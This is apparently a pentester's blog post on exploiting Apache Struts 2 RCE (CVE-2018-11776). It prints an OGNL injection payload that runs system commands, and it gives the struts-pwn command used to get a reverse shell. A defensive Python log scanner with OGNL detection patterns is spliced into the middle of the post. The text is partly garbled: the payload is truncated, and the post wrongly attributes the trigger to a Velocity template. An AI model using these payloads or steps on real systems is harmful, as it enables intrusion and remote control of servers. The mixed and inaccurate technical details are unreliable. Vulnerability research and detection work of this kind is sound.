This blog post describes my finding, on a web-based application, of a very well-known vulnerability: Apache Struts 2 RCE (Remote Code Execution).


History of Apache Struts-2:-

Apache Struts is one of the popular open-source web frameworks and is heavily used by banks and government organizations. It is modern, clean and elegant, but security-wise Struts is not having a good time. The vulnerability in older versions affects all versions of the Struts REST plugin, and it has been found to impact several Fortune companies. An exploit for it has been published, and a lot of web applications were being exploited on a massive scale.


How I Started:-

While I was hunting on a few websites I came across this link, and during my recon process I learned that it was vulnerable to the Apache Struts 2 RCE. Just to reconfirm this and get proper details of the Struts installation, I used an online tool named “Contrast”. I only needed to give the URL to the tool, and it gave me back the whole details of the Apache Struts deployment, along with the proper parameter for the same.

Contrast showing the whole details of the application

Then, after getting the proper parameter, I tested those parameters in Burp Suite with some payloads.

${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22whoami%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’).getWriter(),%23screen.println(%23d),%23screen.close()}”>test.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22netstat%22,%22-an%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java

Payload resulted in the hostname

The vulnerability trigger is then completed by sending a malicious Velocity template via a GET/POST request, with a custom Velocity template parameter in a specially crafted request, leading to RCE.

I used this payload on the generated parameters and YES, it gave a proper result.
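From the defender's side, the payload above leaves a distinctive trace in web-server access logs: an OGNL expression marker (${ or %{, usually URL-encoded as %24%7B, sometimes double-encoded) in the request path or query, together with tokens such as #context, ProcessBuilder or getWriter. The following Python scanner is an added example, not code from the original post or from the struts-pwn project; the log lines it scans are constructed, and the token list is an assumption drawn from the payload shown above.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2018:10:00:01 +0000] "GET /demo/struts2-showcase/index.action HTTP/1.1" 200 5120
203.0.113.7 - - [10/Sep/2018:10:00:02 +0000] "GET /demo/struts2-showcase/%24%7B%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22whoami%22%7D).start()%7D/index.action HTTP/1.1" 302 0
203.0.113.9 - - [10/Sep/2018:10:00:03 +0000] "GET /demo/test.action?redirect:%24%7B%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter()%7D HTTP/1.1" 200 17
203.0.113.5 - - [10/Sep/2018:10:00:04 +0000] "GET /demo/struts2-showcase/search.action?q=price%20%3C%20%24100 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# OGNL expression markers once the target has been URL-decoded: "${" or "%{".
OGNL_RE = re.compile(r'[$%]\{')
# Tokens taken from the payload in the post; each one is a strong signal
# when it appears inside an OGNL expression (assumed list, extend as needed).
SUSPICIOUS_TOKENS = ("#context", "ProcessBuilder", "java.lang.", "getWriter")


def decode_target(target, max_rounds=3):
    """URL-decode repeatedly (attackers double-encode) until the string stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_request(target):
    """Return the reasons a request target looks like an OGNL injection attempt ([] if clean)."""
    decoded = decode_target(target)
    reasons = []
    if OGNL_RE.search(decoded):  # a bare "$" (e.g. a price) is not enough on its own
        reasons.append("ognl_expression_marker")
        reasons.extend("token:" + tok for tok in SUSPICIOUS_TOKENS if tok in decoded)
    return reasons


def scan_log(text):
    """Return (line_no, client_ip, decoded_target, reasons) for every flagged log line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((n, line.split()[0], decode_target(m.group("target")), reasons))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Line 4 of the sample (a query containing a literal "$100") is deliberately left unflagged, since only the "${" / "%{" expression marker, not a bare dollar sign, is indicative.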

After googling a few links on GitHub, I found an exploit available for the same vulnerability, which was prompting for the RCE itself. GitHub: Here.


We can use the Docker build for Apache Struts and add custom actions to it. I followed what the programmer suggested in his exploit.


Setting up to gain reverse shell:-

  1. After doing some Google searching, I came across a Python script to gain a reverse shell through that parameter.
  2. With just some modification of the Python code, I was able to get the reverse shell.
  3. Here is the Python code: https://github.com/mazen160/struts-pwn_CVE-2018-11776
  4. Command: python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'
  5. Then YES, I got a reverse shell for the same.

Reverse shell executed

How to Mitigate:-

All Apache Struts users should upgrade to the latest version and deploy security patches within 24 hours of availability.

If you are running | Upgrade to
Struts 2.3.x | Struts 2.3.35
Struts 2.5.x | Struts 2.5.17

That is all it takes to get an RCE on a vulnerable Apache Struts 2 instance; you can read more about it under CVE-2018-11776.

Anyway, it was FUN. Thanks for reading.


Author,

Sushant Kamble

Sushant Kamble (sushant@varutra.com)
Attack & Pentest Team
Varutra Consulting Pvt. Ltd.